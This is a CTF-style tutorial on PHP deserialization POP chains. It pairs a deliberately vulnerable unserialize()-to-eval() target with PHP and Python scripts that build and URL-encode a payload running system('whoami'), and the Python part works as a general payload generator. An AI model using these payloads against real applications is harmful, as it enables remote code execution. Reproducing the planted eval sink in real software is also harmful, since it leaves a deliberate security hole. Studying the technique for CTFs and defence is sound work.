Member properties can hold objects!!
When learning POP chains, the usual approach is to work backwards: start from the dangerous sink and trace back to the entry point.
Let's go straight to an example.
Example 1: 橙子
<?php
// Target code (deliberately vulnerable): user input goes straight into unserialize().
class index {
    private $test;
    public function __construct() {
        $this->test = new normal();
    }
    public function __destruct() {
        $this->test->action();   // whatever $test holds gets its action() called
    }
}
class normal {
    public function action() {
        echo "please attack me";
    }
}
class evil {
    var $test2;
    public function action() {
        eval($this->test2);      // the sink: $test2 is executed as PHP code
    }
}
unserialize($_GET['test']);
?>
To get the flag, first locate the code-execution sink. It is the action() method of class evil, which passes the contents of the property $test2 to eval():
class evil {
    var $test2;
    public function action() {
        eval($this->test2);
    }
}
--Working backwards, look for code that calls an action() method. index::__destruct() does, but the constructor sets $test to an instance of normal, so in normal operation it is normal::action() that runs. The goal is to replace the value of $test with an instance of evil so that the same call $this->test->action() reaches evil::action() instead.
class index {
    private $test;
    public function __construct() {
        $this->test = new normal();
    }
    public function __destruct() {
        $this->test->action();
    }
}
--The call to action() lives in the magic method __destruct, and the target conveniently feeds $_GET['test'] to unserialize(). Because the return value of unserialize() is never stored, the reconstructed index object is destroyed as soon as the call returns, which triggers __destruct. Note also that unserialize() does not run __construct, so $test takes whatever value the payload supplies. We can now construct the payload:
(1) Put the PHP code we want executed into test2 of class evil. eval() compiles its argument as PHP code, so use a complete statement with a trailing semicolon.
(2) Make test of class index a new evil(), i.e. an instance of evil rather than normal.
<?php
// Local copies of the two classes, stripped down to what serialize() needs.
// $test stays private so that serialize() mangles its name to "\0index\0test",
// exactly as the target's own class would.
class index {
    private $test;
    public function __construct() {
        $this->test = new evil();
    }
}
class evil {
    var $test2 = "system('whoami');";
}
$a = serialize(new index());
echo $a . "\n";
echo urlencode($a) . "\n";
?>
Output (the %00 in the first line stands for the NUL bytes PHP puts around the class name of a private property; a terminal does not display them, and the URL-encoded second line is the form that actually goes into ?test=):
O:5:"index":1:{s:11:"%00index%00test";O:4:"evil":1:{s:5:"test2";s:17:"system('whoami');";}}
O%3A5%3A%22index%22%3A1%3A%7Bs%3A11%3A%22%00index%00test%22%3BO%3A4%3A%22evil%22%3A1%3A%7Bs%3A5%3A%22test2%22%3Bs%3A17%3A%22system%28%27whoami%27%29%3B%22%3B%7D%7D
There is another approach: build the object graph from outside the classes instead of in a constructor. Be careful that test is private in the target. We can declare it public while generating the payload and then fix the serialized property name by hand.
<?php
class index {
    public $test;   // declared public here; the target declares it private
}
class evil {
    var $test2;
}
$a = new evil();
$a->test2 = "system('whoami');";
$b = new index();
$b->test = $a;
echo serialize($b) . "\n";
echo urlencode(serialize($b)) . "\n";
?>
Output:
O:5:"index":1:{s:4:"test";O:4:"evil":1:{s:5:"test2";s:17:"system('whoami');";}}
O%3A5%3A%22index%22%3A1%3A%7Bs%3A4%3A%22test%22%3BO%3A4%3A%22evil%22%3A1%3A%7Bs%3A5%3A%22test2%22%3Bs%3A17%3A%22system%28%27whoami%27%29%3B%22%3B%7D%7D
Because $test is public here, the property is emitted as s:4:"test". The target's index declares it private, and unserialize() matches declared properties by their mangled name, so a plain "test" would end up as a separate dynamic property while the private $test stays null and $this->test->action() fails. Before sending, replace s:4:"test" with s:11:"%00index%00test" (in the URL-encoded form, s%3A4%3A%22test%22 becomes s%3A11%3A%22%00index%00test%22), which yields the same payload as the first method. The length prefix must be exact: if it does not match the byte count, unserialize() returns false and the chain never fires.
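Recounting length prefixes by hand is where payloads most often break, so here is an added example (not part of the original write-up, and not PHP's own code) that reproduces the subset of PHP's serialize() format this chain needs in Python, including the "\0Class\0prop" mangling for private properties and "\0*\0prop" for protected ones. It goes beyond the page's single case by handling strings, integers, arrays and nested objects generally. The class and property names index, test, evil and test2 come from the example above; the helper names PHPObject, mangle, php_serialize, build_pop_payload and url_encode are this example's own.

```python
# Added example: a minimal re-implementation of PHP serialize() for building
# POP-chain payloads offline. The helper names here are this example's own,
# not PHP APIs; class and property names are those of the index/evil chain.
from urllib.parse import quote


class PHPObject:
    """A PHP object to serialize: class name plus (name, visibility, value)
    triples, where visibility is "public", "protected" or "private"."""

    def __init__(self, cls, props):
        self.cls = cls
        self.props = props


def mangle(cls, name, visibility):
    """PHP stores non-public property names with NUL-delimited prefixes:
    private   -> "\\0ClassName\\0name"
    protected -> "\\0*\\0name"
    public    -> "name"
    unserialize() matches declared properties by this mangled name, so a
    payload that uses the plain name for a private property never lands in
    the declared slot."""
    if visibility == "private":
        return f"\0{cls}\0{name}"
    if visibility == "protected":
        return f"\0*\0{name}"
    if visibility == "public":
        return name
    raise ValueError(f"unknown visibility {visibility!r}")


def php_serialize(value):
    """Serialize a Python value the way PHP serialize() does.
    String lengths are counted in bytes (UTF-8), which is what hand-edited
    payloads most often get wrong."""
    if value is None:
        return "N;"
    if isinstance(value, bool):          # must precede int: bool is an int subclass
        return f"b:{int(value)};"
    if isinstance(value, int):
        return f"i:{value};"
    if isinstance(value, str):
        return f's:{len(value.encode("utf-8"))}:"{value}";'
    if isinstance(value, (list, tuple)):  # list -> PHP array with integer keys
        body = "".join(f"i:{i};" + php_serialize(v) for i, v in enumerate(value))
        return f"a:{len(value)}:{{{body}}}"
    if isinstance(value, dict):           # dict -> PHP array with given keys
        body = "".join(php_serialize(k) + php_serialize(v) for k, v in value.items())
        return f"a:{len(value)}:{{{body}}}"
    if isinstance(value, PHPObject):
        body = "".join(
            php_serialize(mangle(value.cls, name, vis)) + php_serialize(val)
            for name, vis, val in value.props
        )
        return f'O:{len(value.cls)}:"{value.cls}":{len(value.props)}:{{{body}}}'
    raise TypeError(f"cannot serialize {type(value).__name__}")


def build_pop_payload(php_code):
    """index->test (private) holds an evil whose public test2 holds the code
    that evil::action() hands to eval(). php_code must be a complete PHP
    statement, i.e. end with ';'."""
    evil = PHPObject("evil", [("test2", "public", php_code)])
    index = PHPObject("index", [("test", "private", evil)])
    return php_serialize(index)


def url_encode(payload):
    """Percent-encode every non-alphanumeric byte (NUL -> %00). For this
    payload the result is identical to PHP's urlencode()."""
    return quote(payload, safe="")


if __name__ == "__main__":
    raw = build_pop_payload("system('whoami');")
    print(raw.replace("\0", "%00"))   # make the NUL bytes visible, as the write-up does
    print(url_encode(raw))
```

The URL-encoded line is what goes into ?test=; the raw form cannot be typed into a URL because of the NUL bytes. Swapping "private" for "protected" in build_pop_payload is all it takes to target a class whose property has that visibility, and a non-ASCII command string still gets a correct byte length.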